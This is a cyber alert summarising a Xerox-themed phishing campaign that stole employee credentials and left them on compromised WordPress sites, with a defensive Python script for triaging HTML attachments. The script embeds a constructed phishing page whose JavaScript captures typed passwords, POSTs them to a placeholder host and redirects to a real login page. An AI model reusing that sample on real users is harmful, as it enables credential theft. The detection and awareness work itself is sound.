Check Point Research and Otorio published a blog post describing the campaign, in which stolen credentials were dumped on compromised WordPress domains. The phishing attack began with one of several fraudulent email templates that mimicked Xerox/Xeros scan notifications and included the targeted employee's name or title in the subject line. The phishing messages originated from a Linux server hosted on Microsoft Azure and were sent through PHP Mailer and 1&1 email servers. Some were also sent from previously compromised email accounts so that the messages appeared to come from legitimate sources. Each message carried an attached HTML file containing embedded JavaScript with a single job: to watch, in the background, for credentials typed into the attachment's login form. Once input was detected, the credentials were harvested and the victim was redirected to a legitimate login page, so nothing looked amiss.
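The attachment pattern described above (a password field, script that reads what was typed, a network send, then a redirect to a real login page) is easy to triage mechanically. The following script is an added example written for this alert, not code from Check Point, Otorio, or the phishing kit itself: it parses an HTML attachment with the standard library, flags the individual behaviours, and returns a verdict. Both sample attachments are constructed for the example, and the hostnames, paths and form field names in them are invented placeholders.

```python
"""Heuristic triage of HTML e-mail attachments for credential-harvesting lures.

Added example. Looks for the combination the campaign relied on: a password
input, script that reads form values and sends them somewhere, and a redirect
to a legitimate login page afterwards. Heuristic only; tune for your mail flow.
"""
import re
from html.parser import HTMLParser


class _AttachmentParser(HTMLParser):
    """Collects the pieces of an HTML attachment the heuristics look at."""

    def __init__(self):
        super().__init__()
        self.inline_js = []        # bodies of <script> elements
        self.external_js = []      # src attributes of <script src=...>
        self.form_actions = []     # action attributes of <form>
        self.password_inputs = 0   # count of <input type="password">
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
            if a.get("src"):
                self.external_js.append(a["src"])
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form":
            self.form_actions.append(a.get("action", ""))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline_js.append(data)


# Behaviours from the campaign description: read typed values, send them out,
# then forward the victim to a real page. The patterns are deliberately loose.
_READS_INPUT = re.compile(r"\.value\b|FormData\s*\(", re.I)
_NET_SEND = re.compile(r"XMLHttpRequest|fetch\s*\(|sendBeacon|\.src\s*=\s*[\"'`]?https?:", re.I)
_REDIRECT = re.compile(r"location(?:\.href)?\s*=|location\.(?:replace|assign)\s*\(", re.I)


def analyze_html_attachment(html: str) -> dict:
    """Return a verdict plus the individual findings for one HTML attachment."""
    p = _AttachmentParser()
    p.feed(html)
    p.close()
    js = "\n".join(p.inline_js)
    findings = []
    if p.password_inputs:
        findings.append("password_field")          # an e-mailed file asking for a password
    if any(a.lower().startswith(("http://", "https://")) for a in p.form_actions):
        findings.append("form_posts_to_remote_host")
    if p.external_js:
        findings.append("loads_external_script")
    if js:
        findings.append("inline_script")
        if _READS_INPUT.search(js):
            findings.append("script_reads_form_values")
        if _NET_SEND.search(js):
            findings.append("script_sends_data")
        if _REDIRECT.search(js):
            findings.append("script_redirects")
    harvests = "password_field" in findings and (
        "script_sends_data" in findings or "form_posts_to_remote_host" in findings)
    if harvests and "script_redirects" in findings:
        verdict = "likely_credential_phish"
    elif "password_field" in findings or "inline_script" in findings:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "findings": findings,
            "form_actions": p.form_actions, "external_scripts": p.external_js}


# Constructed sample shaped like the scan-notification lure (hostnames and paths invented).
PHISH_SAMPLE = """<html><body>
<h3>Scanned document from Xerox WorkCentre for Jane Doe</h3>
<form id="f" action="https://compromised-site.example/wp-content/uploads/l.php" method="post">
  Email: <input name="u" type="text"><br>
  Password: <input name="p" type="password"><br>
  <button type="submit">Open document</button>
</form>
<script>
document.getElementById("f").onsubmit = function (e) {
  e.preventDefault();
  var x = new XMLHttpRequest();
  x.open("POST", "https://compromised-site.example/wp-content/uploads/l.php");
  x.send("u=" + document.getElementsByName("u")[0].value +
         "&p=" + document.getElementsByName("p")[0].value);
  window.location = "https://login.microsoftonline.com/";
};
</script></body></html>"""

# Constructed sample: a plain notification with a link and no form or script.
BENIGN_SAMPLE = """<html><body>
<p>Your scan is ready.</p>
<p><a href="https://scans.example.net/job/4471">Download PDF</a></p>
</body></html>"""


if __name__ == "__main__":
    for name, sample in (("phish", PHISH_SAMPLE), ("benign", BENIGN_SAMPLE)):
        r = analyze_html_attachment(sample)
        print(name, r["verdict"], r["findings"])
```

In practice you would run this over the decoded `text/html` parts and HTML attachments pulled from a mail gateway quarantine; a "password_field" finding alone is already worth a look, since a legitimate scan notification has no reason to ask for a login inside an attached file.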

The attack bypassed Microsoft Office 365 Advanced Threat Protection (ATP) filtering and stole the credentials of more than a thousand corporate employees. The stolen data was sent to the compromised WordPress servers, where it was saved in files that were publicly readable and indexed by Google, so anyone could find them with a simple search. Attackers often prefer compromised servers to their own infrastructure because the existing websites already have an established reputation: the better known the reputation of the sending or hosting domain, the less likely the email is to be blocked by security vendors.

Based on a subset of roughly 500 of the stolen credentials, the researchers found targets across a wide range of industries, including IT, healthcare, real estate, and manufacturing. However, the threat actors appear to have a particular interest in construction and energy.

What to do?

  • Ensure your network security software is up to date and active.
  • Conduct routine employee training on cyber threats and techniques such as phishing.
  • Perform routine system checks to identify any possible breaches.
  • Perform routine backups and store copies off site in a secure location.

What can you do when this happens to you?

  • If you determine your network has been breached or compromised, immediately disconnect the affected systems from the network and identify any malware present.
  • Determine whether any data has been modified or exfiltrated.
  • If data has been stolen, notify all affected parties, including your local law enforcement data crimes division and the FBI.
  • Restore the network from a known clean backup.


This phishing scam left thousands of stolen passwords exposed through Google search | ZDNet

“This USVBA Cyber Alert is provided by our partner, 171 Comply. Please visit their website to learn more about CMMC and their services.”